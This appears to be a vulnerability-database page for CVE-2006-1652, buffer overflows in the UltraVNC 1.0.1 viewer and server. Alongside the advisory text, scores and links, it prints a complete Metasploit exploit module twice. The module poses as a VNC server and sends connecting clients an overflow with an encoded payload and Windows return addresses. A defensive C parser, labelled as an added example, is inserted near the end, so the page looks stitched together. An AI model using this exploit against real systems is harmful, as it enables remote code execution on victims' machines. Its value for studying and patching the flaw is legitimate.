CVE-2006-1652
CVSS 9.0
Published: 2006-04-06 06:04:00
Revised: 2011-03-07 00:00:00
NMCOEP    

[Original text] Multiple buffer overflows in (a) UltraVNC (aka Ultr@VNC) 1.0.1 and earlier and (b) tabbed_viewer 1.29 (1) allow user-assisted remote attackers to execute arbitrary code via a malicious server that sends a long string to a client that connects on TCP port 5900, which triggers an overflow in Log::ReallyPrint; and (2) allow remote attackers to cause a denial of service (server crash) via a long HTTP GET request to TCP port 5800, which triggers an overflow in VNCLog::ReallyPrint.


[CNNVD] Ultr@VNC Multiple Remote Buffer Overflow Vulnerabilities (CNNVD-200604-071)

        Ultr@VNC is remote terminal emulation software that lets a user display another computer's screen on their own screen over the Internet or a network and perform operations on it.
        Multiple buffer overflow vulnerabilities exist in the Ultr@VNC implementation; a remote attacker may exploit them to take control of the server or the client.
        Ultr@VNC copies data into fixed-size buffers without checking its length, causing a stack overflow; arbitrary instructions may be executed on both the server and the client.

- CVSS (base score)

CVSS score: 9 [Severe (HIGH)]
Confidentiality impact: COMPLETE [total information disclosure; all system files exposed]
Integrity impact: COMPLETE [system integrity can be completely compromised]
Availability impact: COMPLETE [may cause a total system outage]
Attack complexity: LOW [no access restrictions on exploitation]
Attack vector: [--]
Authentication: [--]

- CWE (weakness category)

CWE-119 [Improper Restriction of Operations within the Bounds of a Memory Buffer]

- CPE (affected platforms and products)

cpe:/a:ultravnc:vnc_viewer:1.0.1
cpe:/a:ultravnc:tabbed_viewer:1.29

- OVAL (technical details for detection)

No related OVAL definitions found

- Official database links

http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2006-1652
(official data source) MITRE
http://web.nvd.nist.gov/view/vuln/detail?vulnId=CVE-2006-1652
(official data source) NVD
http://www.cnnvd.org.cn/vulnerability/show/cv_cnnvdid/CNNVD-200604-071
(official data source) CNNVD

- Other links and resources

http://xforce.iss.net/xforce/xfdb/25650
(UNKNOWN)  XF  ultr@vnc-vnclogreallyprint-bo(25650)
http://xforce.iss.net/xforce/xfdb/25648
(UNKNOWN)  XF  untr@vnc-error-bo(25648)
http://www.vupen.com/english/advisories/2006/1240
(VENDOR_ADVISORY)  VUPEN  ADV-2006-1240
http://www.securityfocus.com/bid/17378
(UNKNOWN)  BID  17378
http://www.securityfocus.com/archive/1/archive/1/430711/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060411 Re: Buffer-overflow in Ultr@VNC 1.0.1 viewer POC
http://www.securityfocus.com/archive/1/archive/1/430287/100/0/threaded
(UNKNOWN)  BUGTRAQ  20060405 Re: Buffer-overflow in Ultr@VNC 1.0.1 viewer and server
http://www.securityfocus.com/archive/1/archive/1/429930/100/0/threaded
(VENDOR_ADVISORY)  BUGTRAQ  20060404 Buffer-overflow in Ultr@VNC 1.0.1 viewer and server
http://securityreason.com/securityalert/674
(UNKNOWN)  SREASON  674
http://secunia.com/advisories/19513
(VENDOR_ADVISORY)  SECUNIA  19513
http://milw0rm.com/exploits/1643
(UNKNOWN)  MILW0RM  1643
http://milw0rm.com/exploits/1642
(UNKNOWN)  MILW0RM  1642
http://lists.grok.org.uk/pipermail/full-disclosure/2006-April/044901.html
(UNKNOWN)  FULLDISC  20060404 Buffer-overflow in Ultr@VNC 1.0.1 viewer and server

- Vulnerability information

Ultr@VNC Multiple Remote Buffer Overflow Vulnerabilities
High risk   Buffer overflow
2006-04-06 00:00:00 2006-08-28 00:00:00
Remote
        Ultr@VNC is remote terminal emulation software that lets a user display another computer's screen on their own screen over the Internet or a network and perform operations on it.
        Multiple buffer overflow vulnerabilities exist in the Ultr@VNC implementation; a remote attacker may exploit them to take control of the server or the client.
        Ultr@VNC copies data into fixed-size buffers without checking its length, causing a stack overflow; arbitrary instructions may be executed on both the server and the client.

- Advisory and patch

        The vendor has fixed this security issue in the latest version of the software; download it from the vendor's homepage:
        http://ultravnc.sourceforge.net/

- Vulnerability information (16490)

UltraVNC 1.0.1 Client Buffer Overflow (EDBID:16490)
windows remote
2010-04-30 Verified
0 metasploit
##
# $Id: ultravnc_client.rb 9179 2010-04-30 08:40:19Z jduck $
##

##
# This file is part of the Metasploit Framework and may be subject to
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##

class Metasploit3 < Msf::Exploit::Remote
	Rank = NormalRanking

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'UltraVNC 1.0.1 Client Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in UltraVNC Win32
				Viewer 1.0.1 Release.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision: 9179 $',
			'References'     =>
				[
					[ 'CVE', '2006-1652' ],
					[ 'OSVDB', '24456' ],
					[ 'BID', '17378' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],
					[ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Apr 4 2006',
			'DefaultTarget'  => 0))

		register_options(
			[
				OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
			], self.class)
	end

	def on_client_connect(client)

		rfb = "RFB 003.006\n"

		client.put(rfb)
	end

	def on_client_data(client)
		return if ((p = regenerate_payload(client)) == nil)

		filler = make_nops(980 - payload.encoded.length)

		sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
		sploit << payload.encoded + filler + [target.ret].pack('V')
		sploit << "PASSWORD" + [0xe8, -997].pack('CV')

		print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
		client.put(sploit)

		handler
		service.close_client(client)
	end

end
		

- Vulnerability information (F83231)

UltraVNC 1.0.1 Client Buffer Overflow (PacketStormID:F83231)
2009-11-26 00:00:00
MC  metasploit.com
exploit,overflow
windows
CVE-2006-1652

This Metasploit module exploits a buffer overflow in UltraVNC Win32 Viewer 1.0.1 Release.

##
# $Id$
##

##
# This file is part of the Metasploit Framework and may be subject to 
# redistribution and commercial restrictions. Please see the Metasploit
# Framework web site for more information on licensing and terms of use.
# http://metasploit.com/framework/
##



class Metasploit3 < Msf::Exploit::Remote

	include Msf::Exploit::Remote::TcpServer

	def initialize(info = {})
		super(update_info(info,
			'Name'           => 'UltraVNC 1.0.1 Client Buffer Overflow',
			'Description'    => %q{
				This module exploits a buffer overflow in UltraVNC Win32
				Viewer 1.0.1 Release.
			},
			'Author'         => 'MC',
			'License'        => MSF_LICENSE,
			'Version'        => '$Revision$',
			'References'     => 
				[ 
					[ 'CVE', '2006-1652' ],
					[ 'OSVDB', '24456' ],
					[ 'BID', '17378' ],
				],
			'DefaultOptions' =>
				{
					'EXITFUNC' => 'thread',
				},
			'Payload'        =>
				{
					'Space'    => 500,
					'BadChars' => "\x00",
					'MaxNops'  => 0,
					'StackAdjustment' => -3500,
				},
			'Platform'       => 'win',
			'Targets'        =>
				[
					[ 'Windows 2000 SP4 English',	{ 'Ret' => 0x7c2ec68b } ],
					[ 'Windows XP SP2 English',	{ 'Ret' => 0x77dc15c0 } ],
					[ 'Windows 2003 SP1 English',	{ 'Ret' => 0x76aa679b } ],
				],
			'Privileged'     => false,
			'DisclosureDate' => 'Apr 4 2006',
			'DefaultTarget'  => 0))

		register_options(
			[ 
				OptPort.new('SRVPORT', [ true, "The VNCServer daemon port to listen on", 5900 ])
			], self.class)
	end

	def on_client_connect(client)

		rfb = "RFB 003.006\n"

		client.put(rfb)
	end

	def on_client_data(client)
		return if ((p = regenerate_payload(client)) == nil)

		filler = make_nops(980 - payload.encoded.length)

		sploit =  "\x00\x00\x00\x00\x00\x00\x04\x06" + "Requires Ultr@VNC Authentication\n"
		sploit << payload.encoded + filler + [target.ret].pack('V')
		sploit << "PASSWORD" + [0xe8, -997].pack('CV')

		print_status("Sending #{sploit.length} bytes to #{client.getpeername}:#{client.peerport}...")
		client.put(sploit)

		handler
		service.close_client(client)
	end

end
    

- Vulnerability information

24456
Ultr@VNC Log::ReallyPrint Function Remote Overflow
Remote / Network Access Input Manipulation
Loss of Integrity Upgrade
Exploit Public

- Vulnerability description

A buffer overflow exists in UltraVNC. The Log::ReallyPrint function fails to validate 'connection failed' messages resulting in a buffer overflow. With a malicious VNC server, a context-dependent attacker can cause arbitrary code execution resulting in a loss of integrity.
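An added example, not code from UltraVNC, the advisory, or the Metasploit module above: a bounded C parser for the RFB 3.3 "connection failed" message (4-byte security type 0, 4-byte big-endian reason length, then the reason text, the framing the module's first bytes use), which rejects a declared length such as the module's 0x406 = 1030 before copying anything. The 256-byte cap and the function names are assumptions.

```c
/* Added example (not UltraVNC or Metasploit code): bounded parser for the RFB 3.3
 * "connection failed" message (sectype 0, big-endian length, text). MAX_REASON_LEN is an assumed cap. */
#include <stddef.h>
#include <stdint.h>
#include <string.h>

#define RFB_SECTYPE_FAILED 0u
#define MAX_REASON_LEN 256u
enum rfb_result { RFB_OK = 0, RFB_SHORT = -1, RFB_NOT_FAILURE = -2, RFB_TOO_LONG = -3 };
static uint32_t be32(const unsigned char *p)
{
    return ((uint32_t)p[0] << 24) | ((uint32_t)p[1] << 16) | ((uint32_t)p[2] << 8) | p[3];
}
/* Parses buf[0..len). On RFB_OK the reason is copied to out (NUL-terminated, at most out_sz-1
 * bytes). Lengths above MAX_REASON_LEN or beyond the bytes received are rejected, not trusted. */
int rfb_parse_failure_reason(const unsigned char *buf, size_t len, char *out, size_t out_sz)
{
    if (out_sz == 0 || len < 8) return RFB_SHORT;
    if (be32(buf) != RFB_SECTYPE_FAILED) return RFB_NOT_FAILURE;
    uint32_t reason_len = be32(buf + 4);
    if (reason_len > MAX_REASON_LEN) return RFB_TOO_LONG; /* 0x406 = 1030 lands here */
    if (reason_len > len - 8) return RFB_SHORT;           /* truncated read */
    size_t n = reason_len < out_sz - 1 ? reason_len : out_sz - 1;
    memcpy(out, buf + 8, n);
    out[n] = '\0';
    return RFB_OK;
}

/* Constructed sample: a well-formed 17-byte reason. check_benign returns the parser
 * status, or 99 if the copied text does not match the sample (truncated to out_sz-1). */
static const unsigned char BENIGN_MSG[] = "\x00\x00\x00\x00\x00\x00\x00\x11" "connection failed";

int check_benign(size_t out_sz)
{
    char out[64];
    int rc = rfb_parse_failure_reason(BENIGN_MSG, sizeof BENIGN_MSG - 1, out, out_sz);
    if (rc == RFB_OK && strncmp(out, "connection failed", out_sz - 1) != 0) return 99;
    return rc;
}

/* Constructed sample: the module's 8-byte header (declared length 1030) followed by
 * 1030 filler bytes in place of its payload; must be rejected before any copy. */
int parse_oversized(void)
{
    unsigned char msg[8 + 1030];
    char reason[MAX_REASON_LEN + 1];
    memcpy(msg, "\x00\x00\x00\x00\x00\x00\x04\x06", 8);
    memset(msg + 8, 'A', 1030);
    return rfb_parse_failure_reason(msg, sizeof msg, reason, sizeof reason);
}
```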

- Timeline

2006-04-04 Unknown
2006-04-11 Unknown

- Solution

Upgrade to version 1.0.2 or higher, as it has been reported to fix this vulnerability. An upgrade is required as there are no known workarounds.

- References

- Vulnerability author
